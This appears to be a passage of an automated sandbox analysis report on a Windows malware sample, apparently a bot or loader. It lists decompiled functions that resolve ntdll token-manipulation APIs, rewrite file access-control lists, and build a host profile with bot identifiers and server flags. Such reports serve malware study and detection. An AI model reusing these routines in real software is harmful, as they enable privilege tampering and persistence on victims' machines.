                                                                                                                                  0x00401279
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401279
                                                                                                                                  0x0040125a
                                                                                                                                  0x0040123f
                                                                                                                                  0x00401223
                                                                                                                                  0x00401207
                                                                                                                                  0x004011e8
                                                                                                                                  0x004011c8
                                                                                                                                  0x004011a8
                                                                                                                                  0x00401189
                                                                                                                                  0x00401169
                                                                                                                                  0x00401149
                                                                                                                                  0x0040112a
                                                                                                                                  0x0040110a
                                                                                                                                  0x004010ea
                                                                                                                                  0x0040127f
                                                                                                                                  0x004010ae
                                                                                                                                  0x004010b4
                                                                                                                                  0x004010b4
                                                                                                                                  0x0040100d
                                                                                                                                  0x00401012
                                                                                                                                  0x00401018
                                                                                                                                  0x0040101f
                                                                                                                                  0x00000000
                                                                                                                                  0x00401022
                                                                                                                                  0x00401022
                                                                                                                                  0x00401022
                                                                                                                                  0x0040101f

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(ntdll.dll,00000000,00401839,00409646), ref: 00401012
                                                                                                                                  • GetProcAddress.KERNEL32(?,RtlExpandEnvironmentStrings_U), ref: 004010C2
                                                                                                                                  • GetProcAddress.KERNEL32(?,RtlSetLastWin32Error), ref: 004010E1
                                                                                                                                  • GetProcAddress.KERNEL32(?,NtTerminateProcess), ref: 00401101
                                                                                                                                  • GetProcAddress.KERNEL32(?,RtlFreeSid), ref: 00401121
                                                                                                                                  • GetProcAddress.KERNEL32(?,RtlInitUnicodeString), ref: 00401140
                                                                                                                                  • GetProcAddress.KERNEL32(?,NtSetInformationThread), ref: 00401160
                                                                                                                                  • GetProcAddress.KERNEL32(?,NtSetInformationToken), ref: 00401180
                                                                                                                                  • GetProcAddress.KERNEL32(?,RtlNtStatusToDosError), ref: 0040119F
                                                                                                                                  • GetProcAddress.KERNEL32(?,NtClose), ref: 004011BF
                                                                                                                                  • GetProcAddress.KERNEL32(?,NtOpenProcessToken), ref: 004011DF
                                                                                                                                  • GetProcAddress.KERNEL32(?,NtDuplicateToken), ref: 004011FE
                                                                                                                                  • GetProcAddress.KERNEL32(?,RtlAllocateAndInitializeSid), ref: 0040121A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                  • String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                                                                  • API String ID: 2238633743-3228201535
                                                                                                                                  • Opcode ID: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                                                                  • Instruction ID: c8dd2db2df3f08e17c6117e54d1286841a2c4197db930f8a9693796d5e259140
                                                                                                                                  • Opcode Fuzzy Hash: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                                                                  • Instruction Fuzzy Hash: 2F5100B1662641A6D7118F69EC84BD23AE86748372F14837B9520F62F0D7F8CAC1CB5D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040B211 Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 131timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                  			E0040B211(FILETIME* _a4, CHAR* _a8, signed int _a12) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				CHAR* _v32;
				CHAR* _v36;
				CHAR* _v40;
				CHAR* _v44;
				CHAR* _v48;
				CHAR* _v52;
				CHAR* _v56;
				CHAR* _v60;
				CHAR* _v64;
				CHAR* _v68;
				CHAR* _v72;
				CHAR* _v76;
				CHAR* _v80;
				CHAR* _v84;
				CHAR* _v88;
				CHAR* _v92;
				CHAR* _v96;
				CHAR* _v100;
				CHAR* _v104;
				struct _TIME_ZONE_INFORMATION _v276;
				long _t77;
				signed int _t80;
				signed int _t93;
				signed int _t101;
				signed int _t102;
				CHAR* _t103;
				signed int _t104;
				signed short _t106;
				signed short _t109;
				signed int _t114;
				signed int _t115;
				void* _t117;

				_v56 = "Sun";
				_v52 = "Mon";
				_v48 = "Tue";
				_v44 = "Wed";
				_v40 = "Thu";
				_v36 = "Fri";
				_v32 = "Sat";
				_v104 = "Jan";
				_v100 = "Feb";
				_v96 = "Mar";
				_v92 = "Apr";
				_v88 = "May";
				_v84 = "Jun";
				_v80 = "Jul";
				_v76 = "Aug";
				_v72 = "Sep";
				_v68 = "Oct";
				_v64 = "Nov";
				_v60 = "Dec";
				if(_a4 != 0) {
					FileTimeToLocalFileTime(_a4,  &_v12);
					FileTimeToSystemTime( &_v12,  &_v28);
				} else {
					GetLocalTime( &_v28);
				}
				_t114 = _a12;
				if(_t114 != 0) {
					SystemTimeToFileTime( &_v28,  &_v12);
					_t93 = E0040ECA5();
					if(_t114 <= 0) {
						_t104 = _t93 %  ~_t114 * 0x23c34600;
						_v12.dwLowDateTime = _v12.dwLowDateTime - _t104;
						asm("sbb [ebp-0x4], ebx");
					} else {
						_t104 = _t93 % _t114 * 0x23c34600;
						_v12.dwLowDateTime = _v12.dwLowDateTime + _t104;
						asm("adc [ebp-0x4], ebx");
					}
					FileTimeToSystemTime( &_v12,  &_v28);
				}
				_v276.Bias = 0;
				_t77 = GetTimeZoneInformation( &_v276);
				_t101 = _v276.Bias;
				if(_t77 == 2) {
					_t101 = _t101 + _v276.DaylightBias;
				}
				_t102 =  ~_t101;
				asm("cdq");
				_t80 = (_t102 ^ _t104) - _t104;
				if(_v28.wDayOfWeek > 6) {
					_t109 = 6;
					_v28.wDayOfWeek = _t109;
				}
				if(_v28.wMonth == 0) {
					_v28.wMonth = 1;
				}
				if(_v28.wMonth > 0xc) {
					_t106 = 0xc;
					_v28.wMonth = _t106;
				}
				_t103 = "+";
				if(_t102 < 0) {
					_t103 = "-";
				}
				_t115 = 0x3c;
				asm("cdq");
				return wsprintfA(_a8, "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",  *((intOrPtr*)(_t117 + (_v28.wDayOfWeek & 0x0000ffff) * 4 - 0x34)), _v28.wDay & 0x0000ffff,  *((intOrPtr*)(_t117 + (_v28.wMonth & 0x0000ffff) * 4 - 0x68)), _v28.wYear & 0x0000ffff, _v28.wHour & 0x0000ffff, _v28.wMinute & 0x0000ffff, _v28.wSecond & 0x0000ffff, _t103, _t80 / _t115, _t80 % _t115);
			}





































                                                                                                                                  0x0040b225
                                                                                                                                  0x0040b22c
                                                                                                                                  0x0040b233
                                                                                                                                  0x0040b23a
                                                                                                                                  0x0040b241
                                                                                                                                  0x0040b248
                                                                                                                                  0x0040b24f
                                                                                                                                  0x0040b256
                                                                                                                                  0x0040b25d
                                                                                                                                  0x0040b264
                                                                                                                                  0x0040b26b
                                                                                                                                  0x0040b272
                                                                                                                                  0x0040b279
                                                                                                                                  0x0040b280
                                                                                                                                  0x0040b287
                                                                                                                                  0x0040b28e
                                                                                                                                  0x0040b295
                                                                                                                                  0x0040b29c
                                                                                                                                  0x0040b2a3
                                                                                                                                  0x0040b2ad
                                                                                                                                  0x0040b2c2
                                                                                                                                  0x0040b2d0
                                                                                                                                  0x0040b2af
                                                                                                                                  0x0040b2b3
                                                                                                                                  0x0040b2b3
                                                                                                                                  0x0040b2d2
                                                                                                                                  0x0040b2d7
                                                                                                                                  0x0040b2e1
                                                                                                                                  0x0040b2e7
                                                                                                                                  0x0040b2f0
                                                                                                                                  0x0040b306
                                                                                                                                  0x0040b30c
                                                                                                                                  0x0040b30f
                                                                                                                                  0x0040b2f2
                                                                                                                                  0x0040b2f4
                                                                                                                                  0x0040b2fa
                                                                                                                                  0x0040b2fd
                                                                                                                                  0x0040b2fd
                                                                                                                                  0x0040b31a
                                                                                                                                  0x0040b31a
                                                                                                                                  0x0040b323
                                                                                                                                  0x0040b329
                                                                                                                                  0x0040b32f
                                                                                                                                  0x0040b338
                                                                                                                                  0x0040b33a
                                                                                                                                  0x0040b33a
                                                                                                                                  0x0040b33d
                                                                                                                                  0x0040b341
                                                                                                                                  0x0040b344
                                                                                                                                  0x0040b34b
                                                                                                                                  0x0040b34f
                                                                                                                                  0x0040b350
                                                                                                                                  0x0040b350
                                                                                                                                  0x0040b358
                                                                                                                                  0x0040b35d
                                                                                                                                  0x0040b35d
                                                                                                                                  0x0040b366
                                                                                                                                  0x0040b36a
                                                                                                                                  0x0040b36b
                                                                                                                                  0x0040b36b
                                                                                                                                  0x0040b371
                                                                                                                                  0x0040b376
                                                                                                                                  0x0040b378
                                                                                                                                  0x0040b378
                                                                                                                                  0x0040b37f
                                                                                                                                  0x0040b380
                                                                                                                                  0x0040b3c4

                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(0003E800,?,0003E800,00000000), ref: 0040B2B3
                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(00000000,00000000,?,0003E800,00000000), ref: 0040B2C2
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B2D0
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(0003E800,00000000), ref: 0040B2E1
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B31A
                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?), ref: 0040B329
                                                                                                                                  • wsprintfA.USER32 ref: 0040B3B7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$File$System$Local$InformationZonewsprintf
                                                                                                                                  • String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
                                                                                                                                  • API String ID: 766114626-2976066047
                                                                                                                                  • Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                                                                  • Instruction ID: 3cccae2c5b68faf9d5e65ebc3321ef0303f497beb4f825406ae493c25d793f5b
                                                                                                                                  • Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                                                                  • Instruction Fuzzy Hash: D8510EB1D0021CAADF18DFD5D8495EEBBB9EF48304F10856BE501B6250E7B84AC9CF98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00407809 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 226memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E00407809(CHAR* _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				void* _v16;
				struct _ACL* _v20;
				signed int _v24;
				int _v28;
				long _v32;
				long _v36;
				long _v40;
				long _v44;
				int _v48;
				int _v52;
				union _SID_NAME_USE _v56;
				int _v60;
				void _v128;
				char _v384;
				char _v512;
				struct _SECURITY_DESCRIPTOR _v1536;
				struct _ACL* _t110;
				int _t120;
				intOrPtr _t121;
				signed int _t123;
				signed int _t141;
				char* _t146;
				signed int _t153;
				void* _t154;
				void* _t155;
				void* _t156;

				_t141 = 0;
				_v28 = 0;
				_v20 = 0;
				_v36 = 0x80;
				if(GetUserNameA( &_v384,  &_v36) == 0) {
					L42:
					return _v28;
				}
				_v32 = 0x44;
				_v40 = 0x80;
				if(LookupAccountNameA(0,  &_v384,  &_v128,  &_v32,  &_v512,  &_v40,  &_v56) == 0) {
					goto L42;
				}
				_v32 = GetLengthSid( &_v128);
				_v44 = 0x400;
				if(GetFileSecurityA(_a4, 5,  &_v1536, 0x400,  &_v44) == 0) {
					goto L42;
				} else {
					if(GetSecurityDescriptorOwner( &_v1536,  &_v16,  &_v48) != 0) {
						_v36 = 0x80;
						_v40 = 0x80;
						if(EqualSid( &_v128, _v16) == 0) {
							_v28 = 1;
							_t155 = LocalAlloc(0x40, 0x14);
							if(_t155 != 0) {
								LocalFree(_t155);
							}
						}
					}
					_v24 = _t141;
					if(GetSecurityDescriptorDacl( &_v1536,  &_v60,  &_v20,  &_v52) == 0) {
						L41:
						goto L42;
					}
					_t110 = _v20;
					if(_t110 == _t141) {
						goto L41;
					}
					_v8 = _v8 & _t141;
					if(0 >= _t110->AceCount) {
						goto L41;
					} else {
						goto L13;
					}
					do {
						L13:
						if(GetAce(_t110, _v8,  &_v12) == 0) {
							L32:
							_v8 = _v8 + 1;
							goto L33;
						}
						_t153 = 0;
						_v16 = _v12 + 8;
						if(_t141 <= 0) {
							L19:
							if(_t141 < 0x20) {
								 *((intOrPtr*)(_t156 + _t141 * 4 - 0xfc)) = _v16;
								_t141 = _t141 + 1;
							}
							_t120 = EqualSid( &_v128, _v16);
							_t146 = _v12;
							if(_t120 == 0) {
								_t121 = 0x1200a8;
							} else {
								asm("sbb eax, eax");
								_t121 = ( ~_a8 & 0x00090046) + 0x1601b9;
							}
							if( *((intOrPtr*)(_t146 + 4)) != _t121) {
								 *((intOrPtr*)(_t146 + 4)) = _t121;
								_t146 = _v12;
								_v24 = 1;
							}
							if( *_t146 != 0 || ( *(_t146 + 1) & 0x00000010) != 0) {
								 *_t146 = 0;
								_t66 = _v16 + 8; // 0xc8685f74
								_t123 =  *_t66;
								if(_t123 != 0) {
									 *((char*)(_v12 + 1)) = (_t123 & 0xffffff00 | _t123 - 0x00000050 > 0x00000000) + 2;
								} else {
									 *((char*)(_v12 + 1)) = 0xb;
								}
								_v24 = 1;
							}
							goto L32;
						}
						while(EqualSid( *(_t156 + _t153 * 4 - 0xfc), _v16) == 0) {
							_t153 = _t153 + 1;
							if(_t153 < _t141) {
								continue;
							}
							break;
						}
						if(_t153 >= _t141) {
							goto L19;
						}
						DeleteAce(_v20, _v8);
						_v24 = 1;
						L33:
						_t110 = _v20;
					} while (_v8 < (_t110->AceCount & 0x0000ffff));
					if(_v24 != 0) {
						_v28 = 1;
						_t154 = LocalAlloc(0x40, 0x14);
						if(_t154 != 0) {
							if(InitializeSecurityDescriptor(_t154, 1) != 0 && SetSecurityDescriptorDacl(_t154, 1, _v20, 0) != 0 && SetFileSecurityA(_a4, 4, _t154) != 0) {
								_v28 = 1;
							}
							LocalFree(_t154);
						}
					}
					goto L41;
				}
			}































                                                                                                                                  0x0040781e
                                                                                                                                  0x00407826
                                                                                                                                  0x00407829
                                                                                                                                  0x0040782c
                                                                                                                                  0x00407837
                                                                                                                                  0x00407a8e
                                                                                                                                  0x00407a94
                                                                                                                                  0x00407a94
                                                                                                                                  0x0040785c
                                                                                                                                  0x00407863
                                                                                                                                  0x0040786e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040787e
                                                                                                                                  0x0040788b
                                                                                                                                  0x004078a2
                                                                                                                                  0x00000000
                                                                                                                                  0x004078a8
                                                                                                                                  0x004078c3
                                                                                                                                  0x004078cc
                                                                                                                                  0x004078cf
                                                                                                                                  0x004078da
                                                                                                                                  0x004078e0
                                                                                                                                  0x004078e9
                                                                                                                                  0x004078ed
                                                                                                                                  0x00407917
                                                                                                                                  0x00407917
                                                                                                                                  0x004078ed
                                                                                                                                  0x004078da
                                                                                                                                  0x00407930
                                                                                                                                  0x0040793b
                                                                                                                                  0x00407a8d
                                                                                                                                  0x00000000
                                                                                                                                  0x00407a8d
                                                                                                                                  0x00407941
                                                                                                                                  0x00407946
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040794c
                                                                                                                                  0x00407955
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040795b
                                                                                                                                  0x0040795b
                                                                                                                                  0x0040796b
                                                                                                                                  0x00407a2a
                                                                                                                                  0x00407a2a
                                                                                                                                  0x00000000
                                                                                                                                  0x00407a2a
                                                                                                                                  0x00407977
                                                                                                                                  0x00407979
                                                                                                                                  0x0040797e
                                                                                                                                  0x004079ae
                                                                                                                                  0x004079b1
                                                                                                                                  0x004079b6
                                                                                                                                  0x004079bd
                                                                                                                                  0x004079bd
                                                                                                                                  0x004079c5
                                                                                                                                  0x004079cb
                                                                                                                                  0x004079d0
                                                                                                                                  0x004079e5
                                                                                                                                  0x004079d2
                                                                                                                                  0x004079d7
                                                                                                                                  0x004079de
                                                                                                                                  0x004079de
                                                                                                                                  0x004079ed
                                                                                                                                  0x004079ef
                                                                                                                                  0x004079f2
                                                                                                                                  0x004079f5
                                                                                                                                  0x004079f5
                                                                                                                                  0x004079fb
                                                                                                                                  0x00407a03
                                                                                                                                  0x00407a09
                                                                                                                                  0x00407a09
                                                                                                                                  0x00407a0e
                                                                                                                                  0x00407a24
                                                                                                                                  0x00407a10
                                                                                                                                  0x00407a13
                                                                                                                                  0x00407a13
                                                                                                                                  0x00407a27
                                                                                                                                  0x00407a27
                                                                                                                                  0x00000000
                                                                                                                                  0x004079fb
                                                                                                                                  0x00407980
                                                                                                                                  0x00407994
                                                                                                                                  0x00407997
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407997
                                                                                                                                  0x0040799b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004079a3
                                                                                                                                  0x004079a9
                                                                                                                                  0x00407a2d
                                                                                                                                  0x00407a2d
                                                                                                                                  0x00407a34
                                                                                                                                  0x00407a41
                                                                                                                                  0x00407a47
                                                                                                                                  0x00407a50
                                                                                                                                  0x00407a54
                                                                                                                                  0x00407a60
                                                                                                                                  0x00407a83
                                                                                                                                  0x00407a83
                                                                                                                                  0x00407a87
                                                                                                                                  0x00407a87
                                                                                                                                  0x00407a54
                                                                                                                                  0x00000000
                                                                                                                                  0x00407a41

                                                                                                                                  APIs
                                                                                                                                  • GetUserNameA.ADVAPI32(?,?), ref: 0040782F
                                                                                                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00407866
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00407878
                                                                                                                                  • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 0040789A
                                                                                                                                  • GetSecurityDescriptorOwner.ADVAPI32(?,00407F63,?), ref: 004078B8
                                                                                                                                  • EqualSid.ADVAPI32(?,00407F63), ref: 004078D2
                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 004078E3
                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 004078F1
                                                                                                                                  • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407901
                                                                                                                                  • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00407910
                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00407917
                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00407933
                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00407963
                                                                                                                                  • EqualSid.ADVAPI32(?,00407F63), ref: 0040798A
                                                                                                                                  • DeleteAce.ADVAPI32(?,00000000), ref: 004079A3
                                                                                                                                  • EqualSid.ADVAPI32(?,00407F63), ref: 004079C5
                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 00407A4A
                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407A58
                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00407A69
                                                                                                                                  • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00407A79
                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00407A87
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                                                                  • String ID: D
                                                                                                                                  • API String ID: 3722657555-2746444292
                                                                                                                                  • Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                                                                  • Instruction ID: df0c13f2d89176358eaf39038022480abc221899387876bf5e0f356ce13a0778
                                                                                                                                  • Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                                                                  • Instruction Fuzzy Hash: 59813C71E04119ABDB11CFA5DD44FEFBBB8AB08340F14817AE505F6290D739AA41CF69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00401D96 Relevance: 31.7, APIs: 6, Strings: 12, Instructions: 205libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                  			E00401D96(void* __ecx, intOrPtr* _a4) {
				struct _OSVERSIONINFOA _v156;
				struct _SYSTEM_INFO _v192;
				char _v196;
				intOrPtr _v200;
				intOrPtr _t59;
				signed int _t61;
				signed int _t63;
				void* _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				signed int _t71;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				intOrPtr* _t103;
				intOrPtr* _t105;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t114;

				_t105 = _a4;
				_t102 = 0x64;
				E0040EE2A(__ecx, _t105, 0, _t102);
				_t109 =  &_v200 + 0xc;
				 *_t105 = _t102;
				_v156.dwOSVersionInfoSize = 0x9c;
				if(GetVersionExA( &_v156) == 0) {
					 *((char*)(_t105 + 0x41)) = 0;
				} else {
					 *((char*)(_t105 + 0x41)) = (_v156.dwMajorVersion << 4) + _v156.dwMinorVersion;
				}
				GetSystemInfo( &_v192);
				 *((char*)(_t105 + 0x3f)) = _v192.dwNumberOfProcessors;
				_v196 = 0;
				_t103 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				if(_t103 != 0) {
					 *_t103(GetCurrentProcess(),  &_v196);
				}
				_t104 = "localcfg";
				 *((char*)(_t105 + 0x40)) = 2;
				_t59 = E0040E819(1, "localcfg", "lid_file_upd", 0);
				_t92 = "flags_upd";
				 *((intOrPtr*)(_t105 + 0x24)) = _t59;
				 *(_t105 + 4) =  *(_t105 + 4) | E0040E819(1, "localcfg", "flags_upd", 0);
				_t61 =  *(_t105 + 4);
				_t110 = _t109 + 0x20;
				if((_t61 & 0x00000008) != 0) {
					 *(_t105 + 4) = _t61 & 0xfffffff7;
					E0040DF70(1, "work_srv");
					E0040DF70(1, "start_srv");
					_t110 = _t110 + 0x10;
				}
				E0040EA84(1, _t104, _t92, 0);
				_t93 = 0;
				_t63 = E0040E819(1, _t104, "net_type", 0);
				_t111 = _t110 + 0x20;
				 *(_t105 + 0x14) = _t63;
				if(E0040199C(_t63) == 0) {
					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000010;
				} else {
					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000020;
				}
				_t65 = E0040E819(1, _t104, "born_date", _t93);
				_t112 = _t111 + 0x10;
				 *((intOrPtr*)(_t105 + 0x30)) = _t93;
				if(_t65 == _t93) {
					_t97 = E0040F04E(_t93);
					E0040EA84(1, _t104, "born_date", _t97);
					_t112 = _t112 + 0x14;
					 *((intOrPtr*)(_t105 + 0x30)) = _t97;
					_t93 = 0;
				}
				_t94 = "id";
				_t66 = E0040E819(1, _t104, "id", _t93);
				_t113 = _t112 + 0x10;
				 *((intOrPtr*)(_t105 + 0xc)) = _t66;
				if(_t66 == 0) {
					_v200 = E00401B71();
					E0040EA84(1, _t104, _t94, _t77);
					_t113 = _t113 + 0x10;
					 *((intOrPtr*)(_t105 + 0xc)) = _v200;
				}
				_t95 = "hi_id";
				_t67 = E0040E819(1, _t104, "hi_id", 0);
				_t114 = _t113 + 0x10;
				 *((intOrPtr*)(_t105 + 0x10)) = _t67;
				if(_t67 == 0) {
					_v200 = E00401BDF();
					E0040EA84(1, _t104, _t95, _t74);
					_t114 = _t114 + 0x10;
					 *((intOrPtr*)(_t105 + 0x10)) = _v200;
				}
				 *((intOrPtr*)(_t105 + 8)) = 0x5e;
				_t96 = E0040E819(1, _t104, "loader_id", 0);
				if(_t96 == 0) {
					_t96 = 0xd;
					E0040EA84(1, _t104, "loader_id", _t96);
				}
				 *((intOrPtr*)(_t105 + 0x1c)) = _t96;
				 *((intOrPtr*)(_t105 + 0x34)) = E004030B5();
				if( *0x41201d == 0) {
					if( *0x41201f == 0) {
						 *(_t105 + 0x18) =  *(_t105 + 0x18) & 0x00000000;
					} else {
						if(E00406EC3() != 0) {
							 *(_t105 + 0x18) = 2;
						} else {
							 *(_t105 + 0x18) = 0x10;
						}
					}
				} else {
					 *(_t105 + 0x18) = 1;
				}
				if(_v196 != 0) {
					 *(_t105 + 0x18) =  *(_t105 + 0x18) | 0x00000200;
				}
				_t71 = GetTickCount() / 0x3e8;
				 *0x412110 = _t71;
				 *(_t105 + 0x28) = _t71;
				return _t71;
			}


























                                                                                                                                  0x00401d9f
                                                                                                                                  0x00401da9
                                                                                                                                  0x00401daf
                                                                                                                                  0x00401db4
                                                                                                                                  0x00401dbc
                                                                                                                                  0x00401dbe
                                                                                                                                  0x00401dce
                                                                                                                                  0x00401de0
                                                                                                                                  0x00401dd0
                                                                                                                                  0x00401ddb
                                                                                                                                  0x00401ddb
                                                                                                                                  0x00401de8
                                                                                                                                  0x00401dfc
                                                                                                                                  0x00401dff
                                                                                                                                  0x00401e10
                                                                                                                                  0x00401e14
                                                                                                                                  0x00401e22
                                                                                                                                  0x00401e22
                                                                                                                                  0x00401e2a
                                                                                                                                  0x00401e34
                                                                                                                                  0x00401e38
                                                                                                                                  0x00401e3e
                                                                                                                                  0x00401e46
                                                                                                                                  0x00401e4e
                                                                                                                                  0x00401e51
                                                                                                                                  0x00401e54
                                                                                                                                  0x00401e59
                                                                                                                                  0x00401e64
                                                                                                                                  0x00401e67
                                                                                                                                  0x00401e72
                                                                                                                                  0x00401e77
                                                                                                                                  0x00401e77
                                                                                                                                  0x00401e7f
                                                                                                                                  0x00401e84
                                                                                                                                  0x00401e8e
                                                                                                                                  0x00401e93
                                                                                                                                  0x00401e96
                                                                                                                                  0x00401ea0
                                                                                                                                  0x00401ea8
                                                                                                                                  0x00401ea2
                                                                                                                                  0x00401ea2
                                                                                                                                  0x00401ea2
                                                                                                                                  0x00401eb4
                                                                                                                                  0x00401eb9
                                                                                                                                  0x00401ebc
                                                                                                                                  0x00401ec1
                                                                                                                                  0x00401ec9
                                                                                                                                  0x00401ed3
                                                                                                                                  0x00401ed8
                                                                                                                                  0x00401edb
                                                                                                                                  0x00401ede
                                                                                                                                  0x00401ede
                                                                                                                                  0x00401ee1
                                                                                                                                  0x00401ee9
                                                                                                                                  0x00401eee
                                                                                                                                  0x00401ef1
                                                                                                                                  0x00401ef6
                                                                                                                                  0x00401f01
                                                                                                                                  0x00401f05
                                                                                                                                  0x00401f0e
                                                                                                                                  0x00401f11
                                                                                                                                  0x00401f11
                                                                                                                                  0x00401f16
                                                                                                                                  0x00401f1e
                                                                                                                                  0x00401f23
                                                                                                                                  0x00401f26
                                                                                                                                  0x00401f2b
                                                                                                                                  0x00401f36
                                                                                                                                  0x00401f3a
                                                                                                                                  0x00401f43
                                                                                                                                  0x00401f46
                                                                                                                                  0x00401f46
                                                                                                                                  0x00401f52
                                                                                                                                  0x00401f5e
                                                                                                                                  0x00401f65
                                                                                                                                  0x00401f69
                                                                                                                                  0x00401f72
                                                                                                                                  0x00401f77
                                                                                                                                  0x00401f7a
                                                                                                                                  0x00401f82
                                                                                                                                  0x00401f8c
                                                                                                                                  0x00401f9a
                                                                                                                                  0x00401fb7
                                                                                                                                  0x00401f9c
                                                                                                                                  0x00401fa3
                                                                                                                                  0x00401fae
                                                                                                                                  0x00401fa5
                                                                                                                                  0x00401fa5
                                                                                                                                  0x00401fa5
                                                                                                                                  0x00401fa3
                                                                                                                                  0x00401f8e
                                                                                                                                  0x00401f8e
                                                                                                                                  0x00401f8e
                                                                                                                                  0x00401fc0
                                                                                                                                  0x00401fc2
                                                                                                                                  0x00401fc2
                                                                                                                                  0x00401fd6
                                                                                                                                  0x00401fd9
